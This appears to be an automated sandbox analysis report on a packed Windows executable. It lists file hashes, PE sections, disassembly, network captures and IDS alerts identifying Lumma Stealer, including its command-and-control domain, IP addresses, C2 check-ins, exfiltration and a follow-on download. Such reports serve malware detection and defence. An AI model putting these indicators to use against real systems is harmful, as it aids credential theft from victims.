                                                                                                                                                                      Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1817143
                                                                                                                                                                      Entropy (8bit):5.501007973622959
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                      MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                      SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                      SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                      SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1432
                                                                                                                                                                      Entropy (8bit):4.986131881931089
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                      MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                      SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                      SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                      SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):1154
                                                                                                                                                                      Entropy (8bit):4.59126408969148
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                      MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                      SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                      SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                      SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                      Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):7.94748747487582
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:file.exe
                                                                                                                                                                      File size:1'901'056 bytes
                                                                                                                                                                      MD5:4658dfd86a5c61df7f4dc30347017718
                                                                                                                                                                      SHA1:2e998b513681d11bfe238b4dd95849bc78fc8296
                                                                                                                                                                      SHA256:970d268afd9c4051c591faa72ba2da6351852ec16ba8f664bb5813a0238ea243
                                                                                                                                                                      SHA512:dfcfceda932596cce40bf9d9ccf6bd2c58c43a6184cd75875f5797ae0ee0d1699662bf5b4b19f644d068439fc85a2c5431805881b8874e100ce4e2d111609ca5
                                                                                                                                                                      SSDEEP:24576:SEQ25T1IyWZ+FExZH4L6YvFPVn8A2u6EeV7TPXbo2c6Vlq0MM1WBLmBLzZGhgtFm:lQ25rWwuTfoFP1ibEeV7TPSoxaBeL8i
                                                                                                                                                                      TLSH:1E95330F8E0984BFC4E2DBB2229B664917D4DE7BF9BE8F82D4E414698B1F54D3904817
                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g..............................K...........@..........................0K.....0.....@.................................\p..p..
                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                      Entrypoint:0x8b0000
                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                      Instruction
                                                                                                                                                                      jmp 00007F15FC8DDD6Ah
                                                                                                                                                                      pavgb mm3, qword ptr [eax+eax]
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      jmp 00007F15FC8DFD65h
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5705c0x70.idata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x2b0.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x571f80x8.idata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      0x10000x550000x25e001e1ad40e3dc4c9d0f656c68c02a53392False0.9974409550330033data7.979770872652821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x560000x2b00x20087ad6c7f3d2a8f80c482e18d4b6b3f3dFalse0.796875data6.080714076041952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .idata 0x570000x10000x200b32b7c4ad821f82288405a0d11e75f2fFalse0.15625data1.1076713340399604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      0x580000x2b00000x200c888f842c880e99ba5ad73948a517cb0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      tklpndtl0x3080000x1a70000x1a680008735254f9e53de143485f291b3ea843False0.9940238997781065data7.953039924207103IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      natdubhn0x4af0000x10000x4009c95163e647d1e3f98dc7ba1a7612e74False0.7763671875data6.06754816149276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .taggant0x4b00000x30000x2200769adf6aec2d5cd1177ca6152c5ca2fbFalse0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_MANIFEST0x4ae40c0x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                      DLLImport
                                                                                                                                                                      kernel32.dlllstrcpy
                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-11-21T06:23:12.890564+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.6607701.1.1.153UDP
                                                                                                                                                                      2024-11-21T06:23:14.463005+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649710188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:14.463005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:15.248039+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:15.248039+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:16.596064+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649711188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:16.596064+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:17.336101+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649711188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:17.336101+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:18.984401+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649713188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:18.984401+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:19.870507+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649713188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:21.307087+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649719188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:21.307087+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649719188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:23.834009+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649726188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:23.834009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649726188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:26.897012+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649732188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:26.897012+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649732188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:29.725841+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649740188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:29.725841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649740188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:34.813514+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649758188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:34.813514+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649758188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:35.529014+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649758188.114.97.3443TCP
                                                                                                                                                                      2024-11-21T06:23:37.067847+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.649762185.215.113.1680TCP
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 21, 2024 06:23:06.540361881 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                      Nov 21, 2024 06:23:06.540422916 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                      Nov 21, 2024 06:23:06.868467093 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                      Nov 21, 2024 06:23:09.498864889 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:09.498908043 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:09.498980045 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:09.499557018 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:09.499573946 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.476545095 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.476655960 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:11.481000900 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:11.481014967 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.481420994 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.483455896 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:11.483510017 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:11.483515978 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.483674049 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:11.531332016 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.993628979 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.993905067 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:11.994003057 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:11.994175911 CET49709443192.168.2.640.113.103.199
                                                                                                                                                                      Nov 21, 2024 06:23:11.994204998 CET4434970940.113.103.199192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:13.163611889 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:13.163669109 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:13.163800955 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:13.191493034 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:13.191526890 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:14.462894917 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:14.463005066 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:14.466478109 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:14.466489077 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:14.466954947 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:14.509186983 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:14.546984911 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:14.547023058 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:14.547202110 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:15.248045921 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:15.248205900 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:15.248291016 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:15.260322094 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:15.260344982 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:15.260375977 CET49710443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:15.260382891 CET44349710188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:15.328438044 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:15.328499079 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:15.328579903 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:15.328882933 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:15.328898907 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:16.149719954 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                      Nov 21, 2024 06:23:16.150063992 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                      Nov 21, 2024 06:23:16.477806091 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                      Nov 21, 2024 06:23:16.595932007 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:16.596064091 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:16.597238064 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:16.597268105 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:16.597563982 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:16.599261999 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:16.599354982 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:16.599389076 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:16.714509010 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:16.714545012 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:16.714628935 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:16.714970112 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:16.714986086 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.336169958 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.336366892 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.336456060 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.336478949 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.336533070 CET44349711188.114.97.3192.168.2.6
